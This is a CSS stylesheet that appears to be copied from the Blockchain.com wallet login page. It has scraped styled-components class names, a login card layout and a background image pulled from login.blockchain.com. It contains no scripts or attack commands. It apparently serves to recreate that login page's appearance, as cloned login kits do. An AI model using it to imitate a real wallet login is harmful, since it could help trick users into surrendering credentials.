html, body, #app, #app > div {
    padding: 0;
    margin: 0;
    height: 100%;
}
/* HTML5 display-role reset for older browsers */
article, aside, details, figcaption, figure, 
footer, header, hgroup, menu, nav, section {
	display: block;
}
body {
	line-height: 1;
}
ol, ul {
	list-style: none;
}
blockquote, q {
	quotes: none;
}
a{
    color: rgb(53, 63, 82);
}
blockquote:before, blockquote:after,
q:before, q:after {
	content: '';
	content: none;
}
table {
	border-collapse: collapse;
	border-spacing: 0;
}
html, body, #app, #app > div {
    padding: 0;
    margin: 0;
    height: 100%;
}
.eTdLKk {
    background-color: rgb(18, 29, 51);
    height: auto;
    min-height: 100%;
    width: 100%;
    overflow: auto;
}
.dfMFAv {
    position: absolute;
    display: flex;
    flex-direction: column-reverse;
    -webkit-box-pack: start;
    justify-content: flex-start;
    align-items: flex-start;
    z-index: 1050;
}
.cUnQgz {
    position: relative;
    width: 100%;
}
.bixyKR {
    width: 100%;
    height: 112px;
    margin: 0px auto;
    background-color: rgb(18, 29, 51);
}
.csisZY {
    padding: 0px 16px;
    box-sizing: border-box;
    background-color: rgb(18, 29, 51);
    background-image: url(https://login.blockchain.com/img/bg-pattern.svg);
}
.foabOi {
    position: relative;
    display: flex;
    flex-direction: row;
    -webkit-box-pack: justify;
    justify-content: space-between;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    height: 100%;
    background-color: inherit;
}
.eplNXa {
    display: flex;
    flex-direction: row;
    width: 100%;
    -webkit-box-pack: center;
    justify-content: center;
    padding-left: 0px;
}
.gWcMcI {
    display: flex;
    /* padding-left: 24px; */
    -webkit-box-align: center;
    align-items: center;
    /* width: 250px; */
}
.hFPMLV {
    display: flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
}
.gyslwv {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
.hrwGqG {
    width: 240px;
    display: block;
}
.kZQjSW {
    width: auto;
    height: 24px;
}
.cFxPZj {
    display: flex;
    flex-direction: column;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    z-index: 1;
    width: 100%;
    /* margin-top: 173px; */
}
.dYcFFj {
    padding: 32px;
    border-radius: 8px;
    box-sizing: border-box;
    background-color: rgb(255, 255, 255);
    box-shadow: rgb(0 0 0 / 21%) 0px 2px 8px 0px;
    width: 480px;
}
.ckPHQU {
    display: flex;
    -webkit-box-pack: justify;
    justify-content: space-between;
    -webkit-box-align: center;
    align-items: center;
    margin-bottom: 12px;
}
.dFQbEg {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 20px;
    line-height: inherit;
    text-transform: capitalize;
    font-style: normal;
    color: rgb(13, 53, 120);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.FOibX {
    display: flex;
    -webkit-box-pack: justify;
    justify-content: space-between;
    -webkit-box-align: center;
    align-items: center;
    margin-bottom: 24px;
}
.dAsdvb:first-child {
    margin: 10px 16px 10px 0px;
}
.dAsdvb {
    flex: 2 1 0%;
    display: flex;
    flex-direction: column;
    -webkit-box-pack: start;
    justify-content: flex-start;
    align-items: flex-start;
}
.dAsdvb > div:first-child {
    margin-bottom: 5px;
}
.htBqkC {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 14px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(53, 63, 82);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.kqyPYJ {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 400;
    font-size: 12px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(53, 63, 82);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.kFqbFA {
    flex: 1 1 0%;
    display: flex;
    -webkit-box-pack: end;
    justify-content: flex-end;
    align-items: flex-start;
}
.kGiPmD {
    display: flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    width: auto;
    min-width: 140px;
    height: 40px;
    padding: 10px 15px;
    box-sizing: border-box;
    user-select: none;
    text-align: center;
    text-decoration: none;
    vertical-align: middle;
    letter-spacing: normal;
    transition: all 0.2s ease-in-out 0s;
    white-space: nowrap;
    line-height: 1;
    text-transform: none;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
    opacity: 1;
    color: rgb(12, 108, 242);
    background-color: rgb(255, 255, 255);
    border-radius: 8px;
    border-style: solid;
    border-width: 1px;
    border-color: rgb(240, 242, 247);
}
.ilVCyl {
    display: flex;
    flex-direction: column;
    text-align: center;
    margin-top: 20px;
}
.eyjaal {
    display: flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    min-width: 140px;
    height: 56px;
    padding: 10px 15px;
    box-sizing: border-box;
    user-select: none;
    text-align: center;
    text-decoration: none;
    vertical-align: middle;
    letter-spacing: normal;
    transition: all 0.2s ease-in-out 0s;
    white-space: nowrap;
    line-height: 1;
    text-transform: none;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
    opacity: 1;
    color: rgb(255, 255, 255);
    background-color: rgb(12, 108, 242);
    border-radius: 8px;
    border-style: solid;
    border-width: 1px;
    border-color: rgb(12, 108, 242);
}
.goKQXz {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 16px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(255, 255, 255);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.ilVCyl > div:last-child {
    margin-top: 18px;
}
.ijkfny > * {
    display: inline;
    margin-right: 2px;
}
.ijkfny > * {
    white-space: normal;
}
.gXdAEC {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 13px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(53, 63, 82);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.ijkfny > * {
    display: inline;
    margin-right: 2px;
}

.ijkfny > * {
    white-space: normal;
}
.jFYcpm {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 13px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
.GesYI {
    display: flex;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    margin: 6rem 0px 2rem;
    position: absolute;
    bottom: 0;
}
.iwjbKx {
    padding: 0px 2rem;
}
.fVTpCS {
    display: inline-flex;
    text-transform: none;
    position: relative;
}
.ffypnH {
    background-clip: padding-box;
    background-color: rgb(255, 255, 255);
    border: 1px solid rgb(240, 242, 247);
    border-radius: 4px;
    box-shadow: rgb(0 0 0 / 18%) 0px 6px 12px;
    display: none;
    float: none;
    height: auto;
    width: inherit;
    line-height: 20px;
    list-style: outside none none;
    margin: 2px 0px;
    max-height: 230px;
    min-width: 20px;
    overflow: auto;
    padding: 5px 0px;
    position: absolute;
    left: 0px;
    top: auto;
    bottom: 25px;
    z-index: 10;
}
.fYKafc {
    color: rgb(53, 63, 82);
    cursor: pointer;
    padding: 3px 20px;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 14px;
    font-weight: 400;
    text-align: left;
    text-size-adjust: 100%;
    white-space: nowrap;
}
.fGrWeP {
    display: inline-flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    cursor: pointer;
    width: inherit;
    font-size: 16px;
    font-weight: 600;
}
.gujfRv {
    display: inline;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
}
.fGrWeP > * {
    color: rgb(152, 161, 178) !important;
}
.jANxgC {
    margin-left: 4px;
    font-weight: 600;
}
.fGrWeP > * {
    color: rgb(152, 161, 178) !important;
}
.iweiai {
    font-weight: 400;
    font-size: 12px;
    color: rgb(80, 89, 107);
    -webkit-font-smoothing: antialiased;
    cursor: inherit;
    display: flex;
}
.iweiai::before {
    font-family: icomoon, sans-serif;
    content: "î¥€";
}
.dHgYOK {
    margin-top: 4px;
    margin-left: 16px;
    margin-right: 16px;
}
.hasGHX {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 14px;
    font-weight: 500;
    color: rgb(152, 161, 178);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
@media (max-width: 767px){
    .dYcFFj {
        width: 100%;
    }
    .GesYI{
        position: static;
    }
    .cFxPZj{
        margin-top: 0;
    }
}
@media (max-width: 479px){
    .dYcFFj {
        padding: 20px;
    }
    .GesYI{
        margin-top: 13px;
    }
}
i {
    border: solid rgba(255, 255, 255, 0.6);
    border-width: 0 3px 3px 0;
    display: inline-block;
    padding: 3px;
    margin-left:3px;
  }
  
  .down {
      transform: rotate(45deg);
      -webkit-transform: rotate(45deg);
  }
a{
    text-decoration: none;
}